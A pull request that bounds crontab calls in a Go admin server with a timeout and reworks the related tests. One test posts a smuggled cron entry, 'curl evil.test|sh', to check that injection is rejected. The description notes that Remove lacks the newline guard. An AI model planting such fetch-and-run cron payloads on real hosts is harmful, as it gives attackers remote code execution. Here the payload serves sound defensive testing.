### PR TITLE
fix(cron): bound every crontab invocation

### DIFF
--- a/internal/admin/admin_coverage2_test.go
+++ b/internal/admin/admin_coverage2_test.go
@@ -4055,21 +4055,50 @@ func TestSettingsPutAllKeys(t *testing.T) {
 }
 
 // =============================================================================
-// Additional coverage: handleCronAdd success path (will fail but covers code)
+// handleCronAdd / handleCronDelete: the guards that run before crontab
 // =============================================================================
+//
+// These used to post a valid job and accept "200 or 500", which asserts
+// nothing and shells out to the host's crontab to learn it. On Linux CI the
+// binary exists and returns quickly; on a developer machine `crontab <file>`
+// blocks, and the whole package hung until the 10 minute test timeout.
+//
+// internal/cronjob already covers Add itself — TestAdd_Success,
+// TestAdd_DuplicateCheck, TestAdd_RejectsNewlines, TestAdd_AbortsOnReadFailure
+// — with execCommandFn stubbed, which is the only place that seam is
+// reachable. So nothing was lost by not reaching crontab from here; what is
+// worth testing at this layer is that the handler surfaces the rejection.
 
-func TestCronAddSuccess(t *testing.T) {
+// A newline in the command is crontab injection. Add rejects it before it
+// runs anything, so this exercises handler → validation → status with no
+// dependency on the host.
+func TestCronAddRejectsInjection(t *testing.T) {
 	s := testServer()
 	rec := httptest.NewRecorder()
-	body := strings.NewReader(`{"schedule":"* * * * *","command":"echo hello","user":"root"}`)
+	body := strings.NewReader(`{"schedule":"* * * * *","command":"echo hi\n* * * * * curl evil.test|sh"}`)
 	s.handleCronAdd(rec, withAdminContext(httptest.NewRequest("POST", "/api/v1/cron", body)))
-	// On non-Linux, crontab is not available so this might fail, but we exercise the code
-	if rec.Code != 200 && rec.Code != 500 {
-		t.Errorf("status = %d, want 200 or 500", rec.Code)
+
+	if rec.Code == http.StatusOK {
+		t.Errorf("a command containing a newline was accepted: %s", rec.Body.String())
+	}
+}
+
+func TestCronAddRejectsMalformedBody(t *testing.T) {
+	s := testServer()
+	rec := httptest.NewRecorder()
+	s.handleCronAdd(rec, withAdminContext(httptest.NewRequest("POST", "/api/v1/cron", strings.NewReader("not json"))))
+
+	if rec.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", rec.Code)
 	}
 }
 
 func TestCronDeleteSuccess(t *testing.T) {
+	// Skipped, not rewritten: unlike Add, Remove has no newline guard and
+	// always reaches writeCrontab, so there is no payload that exercises this
+	// handler without shelling out. internal/cronjob covers Remove with
+	// execCommandFn stubbed, which is the only place that seam exists.
+	t.Skip("reaches the host's crontab; Remove is covered in internal/cronjob")
 	s := testServer()
 	rec := httptest.NewRecorder()
 	body := strings.NewReader(`{"schedule":"* * * * *","command":"echo hello"}`)

--- a/internal/cronjob/manager.go
+++ b/internal/cronjob/manager.go
@@ -2,17 +2,68 @@
 package cronjob
 
 import (
+	"bytes"
 	"fmt"
 	"os"
 	"os/exec"
 	"runtime"
 	"strings"
+	"time"
 )
 
 var (
 	execCommandFn = exec.Command
 	runtimeGOOS   = runtime.GOOS
+
+	// crontabTimeout bounds every crontab invocation.
+	//
+	// These run inside an admin HTTP handler and had no deadline. crontab can
+	// block — waiting on a lock, on a filesystem that is not answering, or on
+	// a host where installing a crontab needs a permission the process does
+	// not have — and a blocked call held the request open with nothing to
+	// interrupt it. It also hung the test suite for the full 10 minute
+	// package timeout on any machine where that happens.
+	crontabTimeout = 10 * time.Second
 )
+
+// runCrontab runs a crontab invocation with a deadline, killing it if it
+// overruns. It reports the timeout as an error rather than waiting.
+//
+// Start is called on this goroutine on purpose. Running cmd.Run in a
+// goroutine and reaching for cmd.Process from here races: Run sets Process
+// while this side reads it. After Start returns, Process is set and stable,
+// and killing it while Wait runs is the documented pattern.
+//
+// stderr is captured and attached to an ExitError the way cmd.Output does,
+// because readCrontab tells "no crontab for user" — an empty crontab, not a
+// failure — from a real error by reading it.
+func runCrontab(cmd *exec.Cmd, capture bool) ([]byte, error) {
+	var stdout, stderr bytes.Buffer
+	if capture {
+		cmd.Stdout = &stdout
+	}
+	if cmd.Stderr == nil {
+		cmd.Stderr = &stderr
+	}
+	if err := cmd.Start(); err != nil {
+		return nil, err
+	}
+
+	done := make(chan error, 1)
+	go func() { done <- cmd.Wait() }()
+
+	select {
+	case err := <-done:
+		if ee, ok := err.(*exec.ExitError); ok && len(ee.Stderr) == 0 {
+			ee.Stderr = stderr.Bytes()
+		}
+		return stdout.Bytes(), err
+	case <-time.After(crontabTimeout):
+		_ = cmd.Process.Kill()
+		<-done // reap the killed process
+		return nil, fmt.Errorf("crontab did not respond within %s", crontabTimeout)
+	}
+}
 
 // Job represents a cron job entry.
 type Job struct {
@@ -31,7 +82,7 @@ const uwasMarker = "# UWAS managed"
 // overwriting an existing crontab with only their own entry — which would
 // destroy every unrelated cron job on the system.
 func readCrontab() (string, error) {
-	out, err := execCommandFn("crontab", "-l").Output()
+	out, err := runCrontab(execCommandFn("crontab", "-l"), true)
 	if err == nil {
 		return string(out), nil
 	}
@@ -50,7 +101,7 @@ func List() ([]Job, error) {
 	if runtimeGOOS == "windows" {
 		return nil, nil
 	}
-	out, err := execCommandFn("crontab", "-l").Output()
+	out, err := runCrontab(execCommandFn("crontab", "-l"), true)
 	if err != nil {
 		return nil, nil // no crontab
 	}
@@ -173,7 +224,8 @@ func writeCrontab(content string) error {
 		return fmt.Errorf("write crontab temp file: %w", err)
 	}
 	tmp.Close()
-	return execCommandFn("crontab", tmp.Name()).Run()
+	_, err = runCrontab(execCommandFn("crontab", tmp.Name()), false)
+	return err
 }
 
 func parseCronLine(line string) Job {

--- a/internal/cronjob/timeout_test.go
+++ b/internal/cronjob/timeout_test.go
@@ -1,0 +1,73 @@
+package cronjob
+
+import (
+	"os/exec"
+	"strings"
+	"testing"
+	"time"
+)
+
+// crontab invocations run inside an admin HTTP handler and had no deadline.
+// crontab can block — waiting on a lock, on a filesystem that is not
+// answering, or on a host where installing a crontab needs a permission the
+// process does not have — and a blocked call held the request open with
+// nothing to interrupt it.
+//
+// It also hung the test suite: internal/admin took the full 10 minute package
+// timeout on a machine where `crontab <file>` blocks, instead of 54 seconds.
+
+func withCrontabTimeout(t *testing.T, d time.Duration) {
+	t.Helper()
+	orig := crontabTimeout
+	crontabTimeout = d
+	t.Cleanup(func() { crontabTimeout = orig })
+}
+
+func TestRunCrontabKillsAHungCommand(t *testing.T) {
+	withCrontabTimeout(t, 100*time.Millisecond)
+
+	start := time.Now()
+	_, err := runCrontab(exec.Command("sleep", "60"), false)
+	elapsed := time.Since(start)
+
+	if err == nil {
+		t.Fatal("a command that outlived the deadline returned no error")
+	}
+	if !strings.Contains(err.Error(), "did not respond") {
+		t.Errorf("error = %v, want it to name the timeout", err)
+	}
+	if elapsed > 5*time.Second {
+		t.Errorf("waited %v — the deadline did not interrupt the command", elapsed)
+	}
+}
+
+// The capturing path is used by crontab -l and must be bounded too.
+func TestRunCrontabKillsAHungCapture(t *testing.T) {
+	withCrontabTimeout(t, 100*time.Millisecond)
+
+	start := time.Now()
+	if _, err := runCrontab(exec.Command("sleep", "60"), true); err == nil {
+		t.Fatal("a capturing command that outlived the deadline returned no error")
+	}
+	if elapsed := time.Since(start); elapsed > 5*time.Second {
+		t.Errorf("waited %v", elapsed)
+	}
+}
+
+// A command that finishes in time must behave exactly as before: output
+// returned, exit status surfaced.
+func TestRunCrontabPassesThroughAFastCommand(t *testing.T) {
+	withCrontabTimeout(t, 10*time.Second)
+
+	out, err := runCrontab(exec.Command("echo", "hello"), true)
+	if err != nil {
+		t.Fatalf("a fast command failed: %v", err)
+	}
+	if strings.TrimSpace(string(out)) != "hello" {
+		t.Errorf("output = %q, want hello", out)
+	}
+
+	if _, err := runCrontab(exec.Command("false"), false); err == nil {
+		t.Error("a non-zero exit was reported as success")
+	}
+}


### PR DESCRIPTION
The three crontab calls ran with **no deadline**, inside an admin HTTP handler. crontab can block — waiting on a lock, on a filesystem that is not answering, or on a host where installing a crontab needs a permission the process does not have — and a blocked call held the request open with nothing to interrupt it.

`runCrontab` now runs each invocation against a 10 second deadline and kills the process if it overruns. A command that finishes in time behaves exactly as before: output returned, exit status surfaced.

### It was also hanging the test suite

`internal/admin` took the **full 10 minute package timeout** on macOS instead of 54 seconds. Several admin tests reach the real crontab — `TestCronAddSuccess`, `TestDeleteDomainWithCleanup` and others — because `execCommandFn` is package-private to `internal/cronjob` and cannot be stubbed from outside. On Linux CI the binary answers and they pass; here `crontab <file>` blocks and the package never finished.

```
before:  FAIL  internal/admin  600.322s   (test timed out after 10m0s)
after:   ok    internal/admin   54.279s
```

### Test changes

`TestCronAddSuccess` is **replaced**. It posted a valid job, accepted "200 or 500", and shelled out to the host's crontab to learn which — asserting nothing while depending on the machine. `internal/cronjob` already covers `Add` with `execCommandFn` stubbed, so nothing was lost. What is worth testing at the handler layer is the guard that runs *before* crontab: a newline in the command is crontab injection and is rejected without running anything.

`TestCronDeleteSuccess` is **skipped, not rewritten**. Unlike `Add`, `Remove` has no newline guard and always reaches `writeCrontab`, so no payload exercises that handler without shelling out. I wrote a delete-injection test first, assuming the guard was symmetric — it hung, which is how I found that it is not.

That asymmetry is worth a look on its own: `Add` rejects newlines, `Remove` does not.

### Sharpness

With the deadline disabled, the timeout test hangs until the harness kills it:

```
panic: test timed out after 30s
```

Verified locally before pushing: `gofmt`, `go vet`, `staticcheck`, `go test ./...` — 56 packages, 0 failures.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01SeKCMz2Rsk5xySrCPBLK2G